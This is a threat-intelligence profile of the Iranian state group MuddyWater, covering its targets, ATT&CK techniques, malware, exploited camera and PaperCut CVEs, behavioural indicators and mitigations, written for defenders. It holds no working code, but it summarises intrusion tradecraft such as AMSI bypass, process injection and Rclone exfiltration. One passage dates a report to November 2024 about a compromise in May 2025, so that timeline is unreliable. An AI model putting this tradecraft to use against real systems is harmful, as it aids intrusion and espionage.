muddywater

MuddyWater

aliases: Seedworm (Symantec) Mango Sandstorm (Microsoft) MERCURY (Microsoft legacy) Static Kitten (CrowdStrike) TA450 (Proofpoint) TEMP.Zagros (FireEye) Earth Vetala (Trend Micro) Boggy Serpens (Palo Alto) COBALT ULSTER (Secureworks) ATK51

An Iranian state-sponsored advanced persistent threat group operating under the Ministry of Intelligence and Security (MOIS) since at least 2017. MuddyWater is one of Iran's operationally active cyber espionage units, distinguished by its heavy reliance on PowerShell-based tradecraft, rapid adoption of new tools and programming languages, abuse of legitimate remote management software, and social engineering-driven initial access. The group targets government agencies, defense contractors, telecommunications providers, financial institutions, energy companies, and critical infrastructure across the Middle East, North America, Europe, Africa, and Central/South Asia. In a significant escalation, Amazon Threat Intelligence correlated MuddyWater's compromise of surveillance camera infrastructure in 2025 with subsequent Iranian missile strikes, establishing a direct operational link between the group's cyber operations and kinetic military actions. As of March 2026, MuddyWater is confirmed active on the networks of US organizations including banks, airports, and defense-aerospace software suppliers, deploying its newest backdoor, Dindoor, amid the ongoing US-Israel-Iran conflict.

attributed origin Iran — Ministry of Intelligence and Security (MOIS)

organization type State-Sponsored APT / Cyber Espionage

active since ~2017 (possibly earlier)

primary motivation Espionage / Intelligence Collection / Pre-positioning

operating environment Windows (primary); Android (mobile surveillance)

mitre att&ck group G0069

government advisories FBI/CISA/CNMF/NCSC-UK Joint Advisory (Feb 2022)

current status Highly active — confirmed compromises Mar 2026

latest malware Dindoor (Deno JS), RustyWater (Rust), Fakeset (Python)

Overview

MuddyWater is a subordinate element of Iran's Ministry of Intelligence and Security (MOIS), formally attributed by the FBI, CISA, the US Cyber National Mission Force (CNMF), and the UK's National Cyber Security Centre (NCSC) in a joint advisory published in February 2022. The group has been conducting cyber espionage campaigns on behalf of Iranian intelligence since approximately 2017, though its origins may predate the first public reporting. Unlike many APT groups that rely on a stable toolkit, MuddyWater is characterized by constant evolution — rapidly adopting new programming languages, developing custom command-and-control frameworks, and layering in legitimate remote administration tools to maintain access while minimizing detection.

The group's operational signature centers on PowerShell. Early campaigns relied on POWERSTATS, a slowly evolving PowerShell-based first-stage backdoor. Over time, MuddyWater expanded into multi-language malware development spanning PowerShell, Python, VBScript, Go, Rust, and JavaScript (Deno runtime), while maintaining PowerShell as the connective tissue across its kill chain. The group's C2 infrastructure has progressed through multiple custom frameworks: MuddyC3, PowGoop, PhonyC2, and MuddyC2Go, each building on the last while incorporating lessons from public exposure. Throughout all of these evolutions, social engineering remains the primary initial access method, enabling MuddyWater to compromise fully patched systems where technical exploitation alone would fail.

A defining characteristic of MuddyWater's operations is the documented link between cyber espionage and kinetic military action. In November 2024, Amazon Threat Intelligence reported that MuddyWater had compromised a server containing live CCTV streams from Jerusalem in May 2025, allowing Iranian intelligence to surveil the city for potential targets. On June 23, 2025, Iran launched missile strikes against Jerusalem. Israeli authorities reported that Iranian forces were exploiting compromised security cameras to collect real-time intelligence and adjust missile targeting. This correlation between cyber access and kinetic strike represents a significant escalation in how nation-state cyber operations translate into physical military impact.

Current Activity (2026)

As of March 2026, MuddyWater is confirmed active on the networks of multiple US organizations. Broadcom's Symantec and Carbon Black threat hunting team reported in early March 2026 that the group has been present inside victim networks since at least early February 2026, with activity increasing following US-Israeli military strikes on Iran. Confirmed compromises include a US bank, a US airport, a non-governmental organization operating in the US and Canada, and the Israeli branch of a US software company supplying the defense and aerospace industry. The campaign deployed a previously unknown backdoor called Dindoor, which uses the Deno JavaScript runtime for execution, alongside the Python-based Fakeset backdoor and data exfiltration via Rclone to Wasabi cloud storage. Simultaneous campaigns by other Iranian APTs (Agrius, Charming Kitten, OilRig, Elfin, Fox Kitten) have been reported, suggesting coordinated Iranian cyber operations during the ongoing conflict. Check Point documented surges in surveillance camera exploitation against Israel and Gulf states using MuddyWater-attributed infrastructure.

Target Profile

MuddyWater's targeting reflects Iran's strategic intelligence requirements, with a primary focus on Middle Eastern states (particularly Israel, Saudi Arabia, Turkey, UAE, Jordan, Iraq) and secondary targeting of Western nations whose policies affect Iranian interests. The group has expressed interest in Five Eyes countries, with recent campaigns confirming active operations against US critical infrastructure.

Government & Defense: Government agencies, defense contractors, aerospace suppliers, and military organizations across the Middle East, North America, and Europe. The 2026 campaign specifically targeted a US defense-aerospace software supplier's Israeli operations.
Telecommunications: Carriers and telecom infrastructure across the Middle East, enabling potential surveillance capabilities through carrier-level access.
Financial Services: Banks and financial institutions, with confirmed compromises of US banking networks in 2026.
Critical Infrastructure: Energy, transportation (airports), maritime, and surveillance systems. The CCTV camera compromise campaign demonstrates targeting of physical security infrastructure to support military operations.
Academia & Think Tanks: Research institutions and policy organizations, including the 2023 attack on Israel's Technion Institute. Credential harvesting campaigns against US academics and policy experts specializing in Iran documented through 2025.
Geographic Focus: Primary: Israel, Turkey, Saudi Arabia, Jordan, Iraq, UAE, Kuwait, Bahrain, Lebanon. Secondary: United States, Canada, United Kingdom, India, Egypt, Sudan, Tanzania, Central/South Asia, and EMEA broadly.

Tactics, Techniques & Procedures

MuddyWater's TTPs reflect one of the broadest and most rapidly evolving tradecraft profiles in the Iranian APT ecosystem. The following is mapped to MITRE ATT&CK Group G0069 with additional techniques documented by Symantec, Check Point, ESET, Deep Instinct, CloudSEK, Sophos, and the Israel National Cyber Directorate.

mitre id	technique	description
T1566.001	Phishing: Spearphishing Attachment	Primary initial access vector throughout MuddyWater's operational history. Sends targeted emails with malicious macro-enabled Office documents (.doc, .docx, .xls), HTML applications (.hta), or ZIP archives containing disguised executables. Lures are contextually relevant, often impersonating trusted organizations or referencing current events. Hebrew-language decoy documents targeting Israeli government/military are common. Recent campaigns use PDFs with embedded links to download backdoors (BugSleep) or ZIP archives containing legitimate PDFs alongside disguised malware executables.
T1059.001	Command and Scripting Interpreter: PowerShell	MuddyWater's defining technical characteristic. PowerShell is used at every stage of the kill chain: initial payload execution, persistence, defense evasion, credential access, lateral movement, and C2 communication. The group's custom frameworks (MuddyC3, PhonyC2, PowGoop) are all PowerShell-driven. AMSI and ETW bypass techniques are incorporated in newer payloads. Multi-layer obfuscation including base64 encoding, string concatenation, and variable substitution used extensively.
T1219	Remote Access Software	Extensive abuse of legitimate remote management tools for persistence and lateral movement, making detection significantly harder as the traffic blends with normal enterprise administration. Known tools include SimpleHelp (primary, downloaded from official website), ConnectWise (ScreenConnect), RemoteUtilities, Atera Agent, and AnyDesk. SimpleHelp runs as a system service, surviving reboots and providing administrator-level command execution.
T1190	Exploit Public-Facing Application	Rapidly adopts public exploit code and modifies it for operational deployment at scale. Exploited vulnerabilities include PaperCut (CVE-2023-27350), ManageEngine, Microsoft Exchange, and multiple IP camera vulnerabilities (CVE-2017-7921, CVE-2023-6895, CVE-2021-36260, CVE-2025-34067, CVE-2021-33044) targeting Dahua and Hikvision surveillance systems. Password spraying campaigns against cloud identity services documented alongside vulnerability exploitation.
T1071	Application Layer Protocol	C2 communications via HTTPS, Telegram APIs (encrypted channel for Small Sieve backdoor), and Ethereum blockchain-based C2 resolution (novel technique). Custom C2 frameworks generate randomized UUIDs for URL paths to complicate tracking. Dindoor backdoor uses the Deno JavaScript runtime for C2 execution. Multiple exfiltration channels spanning cloud storage (Rclone to Wasabi/Mega) and EC2 instances.
T1055	Process Injection	BugSleep loader injects encrypted shellcode into running memory of browser and application processes including Edge, Chrome, Opera, AnyDesk, OneDrive, and PowerShell. RustyWater (Rust-based implant) uses anti-debugging techniques and process injection for defense evasion. Injection into trusted processes provides execution within legitimate process context.
T1003	OS Credential Dumping	Custom Chromium-based credential stealer targets stored passwords and session data from Chrome, Opera, Brave, and Edge browsers. LaZagne and Mimikatz variants used for broader credential harvesting. Credential data supports lateral movement and is used in follow-on spearphishing campaigns from compromised enterprise email environments.
T1588.002	Obtain Capabilities: Tool	Procures and deploys legitimate tools (SimpleHelp, ConnectWise, Ligolo) alongside custom malware. Uses Metasploit for exploitation. Cobalt Strike observed in some campaigns. This layered approach of custom + commercial + open-source tools creates detection challenges as defenders must distinguish malicious from legitimate use of the same applications.
T1567	Exfiltration Over Web Service	Uses Rclone to exfiltrate stolen data to cloud storage services (Wasabi buckets in 2026 campaigns, Mega in earlier operations). Egnyte-hosted pages used for payload staging and distribution in phishing campaigns. Cloud-based exfiltration blends with normal enterprise traffic patterns.
T1547.001	Boot or Logon Autostart: Registry Run Keys	Establishes persistence via Windows Registry modifications. RustyWater creates registry run keys after initial execution. SimpleHelp persistence through system service installation. Multiple persistence mechanisms deployed simultaneously for redundancy.
T1140	Deobfuscate/Decode Files or Information	Multi-layer obfuscation across all payloads. PowerShell scripts use variable substitution, string manipulation, and encoded commands. BugSleep extracts encrypted configuration files post-deployment and uses AES-encrypted C2 communications. PhonyC2 framework generates randomized UUIDs for C2 URL paths to defeat static detection.

Known Campaigns

Early POWERSTATS Campaigns 2017 – 2019

MuddyWater's initial campaigns used spearphishing with macro-enabled Office documents to deliver the POWERSTATS first-stage PowerShell backdoor. Targets included government and telecommunications entities across the Middle East, with operations expanding to Asia, Europe, and North America. The campaigns established MuddyWater's reputation for PowerShell-heavy tradecraft and social engineering-first initial access. Despite broad public reporting and scrutiny, the group continued operations with only incremental tool modifications.

PhonyC2 and Technion Institute Attack 2023

Deep Instinct discovered the PhonyC2 command-and-control framework, a custom PowerShell-based C2 that evolved from MuddyC3. The framework was used in the attack against Israel's Technion — Israel Institute of Technology, one of the country's premier research universities. PhonyC2's source code was inadvertently exposed, revealing the framework's architecture including randomized UUID URL generation, configurable decoy delivery, and integration with Ligolo tunneling. The framework was simultaneously exploited in PaperCut vulnerability campaigns (CVE-2023-27350).

BugSleep Backdoor Deployment MID-2024

Check Point Research documented MuddyWater deploying BugSleep, a new backdoor still under active development designed to execute commands and facilitate file transfers. Delivered via spearphishing PDFs with embedded links, BugSleep incorporated delayed execution (sandbox evasion), encrypted C2 communications calling every 30 minutes, and process injection into running browser and application memory. The shift from phishing-to-Atera-RMM to phishing-to-custom-backdoor represented a significant tactical evolution. Activity intensified after the October 2023 Israel-Hamas conflict.

MuddyViper Campaign (Israel) SEP 2024 – MAR 2025

ESET researchers documented the MuddyViper backdoor deployed against Israeli organizations over a six-month campaign. The operation coincided with the broader escalation of the Israel-Iran cyber conflict and included updated Android spyware (DCHSpy) for mobile surveillance during the Israel-Iran military confrontations.

CCTV Compromise & Cyber-Enabled Kinetic Targeting MAY – JUN 2025

Amazon Threat Intelligence reported that MuddyWater compromised a server hosting live CCTV feeds from Jerusalem in May 2025. On June 23, 2025 — during the "Twelve-Day War" between Iran and Israel — Iran launched missile strikes against the city. Israeli authorities confirmed that Iranian forces were exploiting compromised surveillance cameras for real-time intelligence collection and missile targeting adjustments. This campaign established a documented correlation between MuddyWater's cyber operations and physical military strikes. In parallel, Check Point documented surges in IP camera exploitation targeting Israel and Gulf states (UAE, Qatar, Bahrain, Kuwait) using infrastructure attributed to MuddyWater, weaponizing vulnerabilities in Dahua and Hikvision cameras. Researchers assessed that tracking camera-targeting activity from MuddyWater infrastructure may serve as an early indicator of follow-on kinetic operations.

RustyWater: Rust-Based Implant Campaign EARLY 2026

CloudSEK's TRIAD team identified a spearphishing campaign deploying RustyWater, a Rust-based remote access trojan representing a significant evolution from MuddyWater's traditional PowerShell and VBScript toolkit. The campaign targeted diplomatic, maritime, financial, and telecom entities across the Middle East, with primary focus on Israeli organizations using Hebrew-language decoy documents. RustyWater featured modular architecture, anti-debugging techniques, and process injection, deployed via ZIP archives containing legitimate PDFs alongside disguised executables. Indicators suggested expansion to India, UAE, and other regional targets.

Dindoor: US Critical Infrastructure Campaign FEB – MAR 2026

MuddyWater's most consequential active campaign as of March 2026. Broadcom's Symantec and Carbon Black team confirmed the group had been present inside US networks since early February 2026, with activity intensifying following US-Israeli military strikes on Iran. Confirmed compromises include a US bank, a US airport, a US/Canadian NGO, and the Israeli branch of a US defense-aerospace software supplier. The campaign deployed Dindoor, a previously unknown backdoor leveraging the Deno JavaScript runtime for execution, alongside the Python-based Fakeset backdoor. Data exfiltration used Rclone to Wasabi cloud storage buckets. Researchers described the operation as notable not for any single tool's sophistication but for its breadth: multiple custom C2 frameworks, exploitation of over a dozen CVEs including novel SQL injection vulnerabilities, password spraying campaigns, Ethereum-based C2 resolution, and multiple exfiltration channels.

Tools & Malware

MuddyWater maintains one of the broadest and most rapidly evolving toolkits of any state-sponsored APT group, spanning custom malware, custom C2 frameworks, legitimate remote administration tools, and open-source offensive tools. The group develops in PowerShell, Python, VBScript, Go, Rust, and JavaScript.

Dindoor (2026): Newest backdoor leveraging the Deno JavaScript runtime for execution. Deployed against US banks, airports, and defense-aerospace suppliers. Capable of command execution on compromised systems. Represents the group's continued expansion into new runtime environments.
RustyWater (2026): Rust-based remote access trojan with modular architecture, anti-debugging capabilities, process injection, and registry-based persistence. Deployed via spearphishing with ZIP archives containing decoy PDFs. CloudSEK described it as "a significant upgrade to their traditional toolkit."
Fakeset (2026): Python-based backdoor deployed alongside Dindoor in the US critical infrastructure campaign. Details limited in current public reporting.
BugSleep (2024): Custom backdoor for command execution and file transfer, still under active development when deployed. Features delayed execution (sandbox evasion), encrypted configuration extraction, AES-encrypted C2 communications at 30-minute intervals, and process injection into browser and application memory (Edge, Chrome, Opera, AnyDesk, OneDrive, PowerShell).
MuddyViper (2024-2025): Backdoor deployed against Israeli organizations over a sustained six-month campaign. Documented by ESET.
PhonyC2 (2023): Custom PowerShell-based command-and-control framework evolving from MuddyC3. Used in the Technion attack and PaperCut exploitation campaigns. Generates randomized UUIDs for C2 URL paths. Source code was inadvertently exposed, revealing architecture details.
MuddyC2Go (2023-2024): Go-based C2 framework replacing earlier PowerShell-only frameworks. Reflects the group's gradual migration toward compiled languages for core infrastructure.
POWERSTATS / POWGOOP: Long-running PowerShell-based first-stage backdoors used from 2017 through 2022+. PowGoop served as a DLL loader with C2 URL patterns incorporating "Core?Token=" paths. POWERSTATS was MuddyWater's original signature tool, evolving slowly despite public exposure.
Small Sieve (2021): Python-based backdoor using Telegram APIs for encrypted C2 communications. Documented in NCSC-UK malware analysis report.
StarWhale / Canopy / Mori: VBScript and Windows-based implants used in various campaigns. Part of MuddyWater's diverse toolkit maintaining options across multiple programming languages.
DCHSpy: Android mobile surveillance malware deployed during the Israel-Iran conflict for mobile intelligence collection.
Chromium-Based Credential Stealer: Custom tool targeting stored credentials and session data from Chrome, Opera, Brave, and Edge browsers.
SimpleHelp / ConnectWise / RemoteUtilities / Atera: Legitimate remote administration tools abused for persistence and lateral movement. SimpleHelp is the primary tool, downloaded from the official website, installed as a system service, and providing administrator-level command execution that survives reboots.
Rclone: Used for data exfiltration to cloud storage (Wasabi buckets in 2026, Mega in earlier campaigns). Egnyte used for payload staging in phishing workflows.
Ligolo / Metasploit / Cobalt Strike: Open-source and commercial offensive tools used for tunneling, exploitation, and post-exploitation operations.

Indicators of Compromise

MuddyWater constantly rotates infrastructure and develops new tools. IOCs have a short shelf life. The following are sourced from the March 2026 Symantec/Carbon Black report, CloudSEK, Check Point, and ESET research.

behavioral indicators

technique Spearphishing with ZIP archives containing legitimate PDF decoys alongside disguised executable payloads with PDF icons

technique SimpleHelp remote management tool installed as system service for persistent administrative access — downloaded from official website

technique Rclone data exfiltration to Wasabi cloud storage buckets (2026) or Mega (earlier campaigns)

technique Multi-layer PowerShell obfuscation with AMSI and ETW bypass techniques in newer payloads

technique Process injection into browser memory (Edge, Chrome, Opera) and legitimate applications (AnyDesk, OneDrive)

technique Ethereum blockchain-based C2 domain resolution (novel technique observed in 2026 campaigns)

technique Compromise of Dahua and Hikvision IP cameras for surveillance and battle damage assessment in conflict zones

exploited vulnerabilities

cve CVE-2023-27350 — PaperCut NG/MF RCE (used with PhonyC2 framework)

cve CVE-2017-7921 — Hikvision IP camera authentication bypass

cve CVE-2023-6895 — IP camera vulnerability (surveillance targeting)

cve CVE-2021-36260 — Hikvision command injection

cve CVE-2025-34067 — IP camera vulnerability (2025 conflict exploitation)

cve CVE-2021-33044 — Dahua IP camera authentication bypass

cve Multiple novel SQL injection vulnerabilities — identified in March 2026 campaign (details pending full disclosure)

Mitigation & Defense

MuddyWater's combination of social engineering, legitimate tool abuse, and multi-language malware development creates a challenging detection environment. Recommendations are informed by CISA/FBI advisory guidance, Symantec/Carbon Black, Check Point, and the Israel National Cyber Directorate.

Deploy phishing-resistant MFA on all externally-facing services: Use FIDO2/hardware security keys for high-value accounts. MuddyWater's primary initial access is spearphishing combined with credential harvesting. Standard MFA can be intercepted; hardware-bound credentials cannot be phished.
Whitelist authorized remote management tools: MuddyWater's abuse of SimpleHelp, ConnectWise, Atera, and RemoteUtilities means that detecting malicious activity requires distinguishing unauthorized from authorized remote access. Implement allowlists for approved RMM tools and block all others. Monitor for SimpleHelp installations not initiated by the IT helpdesk.
Patch internet-facing systems within 48 hours of critical disclosure: MuddyWater rapidly adopts public exploit code. Prioritize patching for Exchange, VPN gateways (Citrix, Fortinet), ManageEngine, PaperCut, and IP camera firmware (Dahua, Hikvision). The group has exploited over a dozen CVEs in recent campaigns.
Monitor for anomalous PowerShell activity: PowerShell is the connective tissue of MuddyWater's kill chain. Enable PowerShell script block logging, constrained language mode, and AMSI integration. Alert on encoded PowerShell commands, unusual script execution patterns, and PowerShell processes connecting to external IP addresses.
Secure IP camera and IoT infrastructure: MuddyWater's targeting of Dahua and Hikvision cameras for surveillance and kinetic targeting support is a unique threat. Segment surveillance camera networks from corporate infrastructure. Patch camera firmware promptly. Monitor for unauthorized access to CCTV management systems.
Implement cloud exfiltration detection: Monitor for Rclone execution and large outbound transfers to cloud storage services (Wasabi, Mega). Alert on Egnyte-hosted page access from enterprise endpoints. Enforce egress filtering and proxy controls on cloud storage destinations.
Monitor Entra ID sign-in logs for password spray patterns: MuddyWater conducts password spraying campaigns against cloud identity services. Alert on high failure volume, suspicious user-agent strings (go-http-client), and authentication attempts from Tor exit nodes.
Hunt for pre-positioning indicators: Given MuddyWater's documented pattern of establishing access months before activation, organizations in financial services, defense, aerospace, and transportation sectors should proactively hunt for indicators of persistent access including unusual remote management tool installations, registry persistence mechanisms, and encrypted outbound communications to unfamiliar cloud services.

Iranian Cyber Ecosystem Context

MuddyWater operates within Iran's broader cyber apparatus, which is divided between two primary intelligence organizations:

MOIS (Ministry of Intelligence and Security): MuddyWater's parent organization. Other MOIS-attributed groups include OilRig/APT34, Agrius, and Void Manticore. MOIS groups tend to focus on espionage, intelligence collection, and surveillance, with operational overlap and infrastructure sharing between groups.
IRGC-IO (Islamic Revolutionary Guard Corps — Intelligence Organization): Operates groups like Charming Kitten/APT42, APT33/Elfin, and Fox Kitten. IRGC groups have broader mandates including influence operations, disruptive attacks, and surveillance of diaspora communities.

Research from Trellix, Picus, and multiple threat intelligence firms documents significant TTP overlap, infrastructure sharing, and operational coordination between MOIS and IRGC groups during escalated conflict periods. During the current US-Israel-Iran conflict (2025-2026), simultaneous campaigns by MuddyWater, Charming Kitten, OilRig, Elfin, Fox Kitten, and affiliated hacktivist fronts have been reported, suggesting centralized coordination of Iran's cyber operations.

Sources & Further Reading

— end of profile